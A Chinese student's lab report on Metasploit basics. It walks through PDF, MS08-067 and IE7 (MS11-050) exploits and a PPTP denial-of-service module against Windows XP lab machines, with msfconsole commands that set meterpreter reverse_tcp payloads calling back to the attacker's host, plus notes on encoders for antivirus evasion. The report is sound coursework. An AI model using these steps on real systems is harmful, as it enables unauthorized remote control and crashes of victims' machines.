20145326蔡馨熤《网络对抗》——MSF基础应用

20145326蔡馨熤《网络对抗》——MSF基础应用

实验后回答问题

  • 用自己的话解释什么是exploit,payload,encode.
  • exploit:起运输的作用,将数据传输到对方主机。
  • payload:其实就是指装载的“具体内容”。就相当于shellcode一样。
  • encode:对需要传输的文件进行编码,使其达到免杀效果。

实验总结与体会

  • 通过这次MSF基础应用的实验。我对MSF里面包括的6个模块都有了一定的认识,先是exploit模块,也就是我们说的渗透模块,包括主动渗透和被动渗透,老师在课上也生动的讲述了区别,我就不赘述了。exploit起运输的作用,将数据传输到对方主机。 post模块指的是在meterpreter中的那些具体操作,比如抓屏,抓键什么的。然后是payload模块,payload其实就是指装载的“具体内容”。就相当于shellcode一样。如果exploit相当于运载火箭,那么Payload就相当于要投放的弹头。payload有三个子目录,分别是single(独立),stager(传输器),stage(传输体)。encoder对需要传输的文件进行编码,使其达到免杀效果,还能消除像“0x00”这种坏字符;nop是空指令(0x90),在“滑翔区”中有重要的应用。最后一个是Auxiliary辅助模块,这是用来搜集情报的,哈哈哈。每一个模块都是一个源代码。我们可以在usr/share/metasploit—framework/modules/中查看每个模块。
  • 这次的实验过程真的是坎坷,我的电脑又卡,开两个虚拟机确实是有点尴尬。其实操作很简单,大家一看就会,但具体操作起来,就是会有各种问题,比如浏览器的版本问题,xp虚拟机的版本问题,任何一个小问题,都会让我们的实验结果不理想。不过还好,最后都一一克服了。也许这就是实验的魅力吧,老师故意给我们设置很多障碍,然后让我们自己想办法去跨越障碍,最后到达胜利的终点。重要的不是结果,重要的而是实验的这个过程,这个过程才能真正的让我们学到东西。不要轻言放弃,要激流勇进,克服一个个困难总是有成就感的!

Adobe阅读器渗透攻击

实验前准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(老师给的xp虚拟机winxpAttaker,密码:mima1234)。
  • 设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。
  • kali下打开显示隐藏文件。

实验过程

  • 在kali终端中开启msfconsole。
  • 输入命令use exploit/windows/fileformat/adobecooltypesing,进入该漏洞模块的使用。
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
  • 输入命令show options显示我们需要在攻击前需要设置的数据。
  • set FILENAME xxx.pdf
  • set LHOST "KALI 的 Ip"
  • set LPORT xxxx
  • 输入exploit,生成pdf文件,可以看到pdf所在文件夹,将pdf复制到靶机里。

  • 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。具体过程不赘述。
  • 使用命令exploit开始攻击,在xp中打开pdf。这里pdf比较难打开。我们可以选择在kali中等结果。如下图:

  • 在靶机xp中使用命令netstat -an,看本地tcp连接。

MS08_067漏洞渗透攻击实践

实验前准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
  • 在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机就可以直接ping通。

实验过程

  • 最开始ping了半天,ping不通,后来发现是ip地址不在同一个网段上,需要重新设置xp的ip地址。具体过程不赘述,地球人都会。因为这里是c类地址,所以前三位一样。我的kali ip是192.168.124.130,xp ip设置为:192.168.124.128。
  • 在kali终端中开启msfconsole。
  • 然后输入命令search ms08_067,会显示出找到的渗透模块。

  • 输入命令use exploit/windows/smb/ms08067netapi,进入该漏洞模块的使用。
  • 再输入命令show payload会显示出有效的攻击载荷。

  • show targets会显示出可以被攻击的靶机的操作系统型号。

  • 使用命令set payload generic/shellreversetcp设置攻击有效载荷。再输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。

  • set LHOST "kali Ip"
  • set RHOST "Win xp Ip"

  • 看看两个主机能不能ping通。

  • exploit开始攻击,在kali上执行ipconfig/all。

  • 在win xp上执行同样的命令,如下图所示:

  • 利用meterpreter进行MS08_067远程漏洞攻击。
  • 进入ms08_067漏洞模块。
  • 设置payload:set payload windows/meterpreter/reverse_tcp。
  • show options,查看需要设置的ip地址。

  • exploit后。ifconfig一下。

  • ps一下

  • 进入shell

MS02 _ 063 _ pptp_dos辅助模块的使用

实验前准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp2/3。
  • 设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。

实验过程

  • 关于辅助模块呢,不知道写啥。先show auxiliary看看。

  • 挑了半天,找了个感兴趣的MS02 _ 063 _ pptp_dos。这是Windows 2000/XP中PPTP服务的拒绝服务攻击缺陷。
  • 攻击者利用此缺陷仅仅能够进行拒绝服务攻击,并不能获得任何信息和任何权限。
  • 风险等级:
    • Internet systems: 严重
    • Intranet systems: 低
    • Client systems: 低

  • 老套路,看看有啥参数要配的。配好后exploit看看效果!可以结合微软的安全报告找感觉。有了微软的安全报告后,各种漏洞对应的年份,适用的靶机系统,攻击效果都一一对应出来了。
  • 攻击靶机后,靶机蓝屏,我没来得及截屏,靶机就自己重启了。这个很厉害。

IE浏览器渗透攻击——MS11050安全漏洞

实验前准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(包含IE7)。
  • 设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。

实验步骤

  • 在kali终端中开启msfconsole。
  • 输入命令use windows/browser/ms11050mshtml_cobjectelement,进入该漏洞模块。
  • 输入info查看信息:

  • show targets看看目标:

  • 再show option,都是老套路。

  • 配好后看看。

  • 然后exploit攻击!可以看见生成一个网址。

  • 然后我们在靶机上登陆这个网址。最开始打不开,后面得知是浏览器的问题,于是我下了个IE7,问题才得到解决。

  • 这个时候kali中显示一个session 1已经创建,输入命令sessions -i 1,开始连接。然后攻击成功了,抓个屏吧。再获取shell。

时间: 2024-10-02 06:33:31

20145326蔡馨熤《网络对抗》——MSF基础应用的相关文章

20145326蔡馨熤《网络对抗》—— Web安全基础实践

20145326蔡馨熤<网络对抗>-- Web安全基础实践 1.实验后回答问题 (1)SQL注入攻击原理,如何防御. 原理: SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统. 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入.前者由不安全的数据库配置或数据库平台的漏洞所致:后者主要是由于程序员对输入未进行细致地过滤,

20145326蔡馨熤《网络对抗》—— Web基础

20145326蔡馨熤<网络对抗>-- Web基础 1.实验后回答问题 (1)什么是表单. 表单是一个包含表单元素的区域,表单元素是允许用户在表单中输入信息的元素,表单在网页中主要负责数据采集功能,一个表单有三个基本组成部分:表单标签.表单域.表单按钮. (2)浏览器可以解析运行什么语言. HTML(超文本标记语言) XML(可扩展标记语言) ASP.Python.PHP.JavaScript等众多脚本语言. (3)WebServer支持哪些动态语言. JavaScript.ASP.PHP.R

20145326蔡馨熤《网络对抗》——恶意代码伪装技术实践

20145326蔡馨熤<网络对抗>--恶意代码伪装技术实践 一.木马化正常软件 基于之前的后门程序,做一些修改.再将修改后的程序的名字改成一个正常软件的名字,蒙蔽用户的眼睛.哈哈哈,瞬间觉得自己好阴险.因为之前安装过Systracer这个工具,这次就把后门程序的名字改为"Systracer安装程序". 然后双击运行"Systracer安装程序.exe".并且成功回连到Kali. 但是有个不足之处,就是程序运行后,会弹出一个类似命令行的"黑框&q

20145326蔡馨熤《网络对抗》—— 网络欺诈技术防范

20145326蔡馨熤<网络对抗>-- 网络欺诈技术防范 1.实验后回答问题 (1)通常在什么场景下容易受到DNS spoof攻击. 通常情况下,计算机受到arp入侵攻击和DNS欺骗攻击,是由于局域网内某台或某几台计算机有毒造成的. 这种攻击非常危险,因为攻击者可能会利用这个技术在公共的wi-fi点上,入侵其他电脑.所以连接一些公共网络的时候,也要慎重. (2)在日常生活工作中如何防范以上两种攻击方法. 输入个人信息前,仔细检查核对域名是否正确. 使用入侵检测系统:只要正确配置和使用入侵检测系

20145326蔡馨熤《信息安全系统设计基础》期末总结

20145326蔡馨熤<信息安全系统设计基础>期末总结 每周作业链接汇总 第0周作业 简要内容:初步翻阅课本,提出问题:学会如何使用虚拟机VirtualBox并成功安装Ubantu:预习了Linux基础入门:阅读了老师推荐的博客并写出了自己的感想. 二维码: 第1周作业 简要内容:初步了解Linux操作系统:介绍了核心的Linux命令:find/locate/cheat/grep/which/whereis. 二维码: 第2周作业 简要内容:介绍了Linux系统下的开发环境.vi的基本操作.g

20145326蔡馨熤《计算机病毒》——高级静态分析

20145326蔡馨熤<计算机病毒>--高级静态分析 尝试使用IDA PRO分析文件lab05-01.dll,回答如下问题: 1.PSLIST导出函数做了什么? 首先在view中选择exports窗口,然后找到PSLIST导出函数. 双击PSLIST,然后按空格键,转换为图形模式,这样的话,观察更直观. 双击第一个call语句.看看有什么发现.如图所示. dwplatformid与2进行比较,看现在是不是处于WIN32-NT的这个平台. majorversion与5进行比较, majorver

20145326蔡馨熤《信息安全系统设计基础》第1周学习总结

20145326蔡馨熤<信息安全系统设计基础>第1周学习总结 教材学习内容总结: 一.Linux基础1.环境登录无需密码自动登录,系统用户名shiyanlou2.环境介绍本实验环境采用带桌面的Ubuntu Linux环境,实验中会用到桌面上的程序:LX终端(LXTerminal): Linux命令行终端,打开后会进入Bash环境,可以使用Linux命令GVim:非常好用的编辑器,最简单的用法可以参考课程Vim编辑器3.环境使用使用GVim编辑器输入实验所需的代码及文件,使用LX终端(LXTer

20145326蔡馨熤《计算机病毒》——静态分析(1)

20145326蔡馨熤<计算机病毒>--静态分析(1) 基于样例代码lab01-01.exe和lab01-01.dll. 相比于VirusTotal,我更喜欢用VirScan,因为前者太慢了.我们可以从报告中获得一些常用的杀毒软件病毒库对于这个文件的比对结果,从而判断是否是病毒文件. lab01-01.exe的扫描报告如下,点击"行为分析"看看. lab01-01.dll的扫描报告如下.点击"行为分析"看看. lab01-01.exe和lab01-01.

20145326蔡馨熤《计算机病毒》——动态分析(1)

20145326蔡馨熤<计算机病毒>--动态分析(1) 基于样例代码lab03-01.exe 找出这个恶意代码的导入函数和字符串列表. 说到导入函数,当然先想到静态分析里面的Dependency Walker工具. 不过,把恶意代码导入Dependency Walker工具的时候,感觉应该加了壳.所以用PEiD进行查壳. 再用脱壳工具进行脱壳,发现竟然脱壳失败. 再利用PEview查看,发现最开始都是乱码,看来的确加了壳.不过我们依旧可以看到有一些路径信息.还有一个网址.一个exe程序名(可能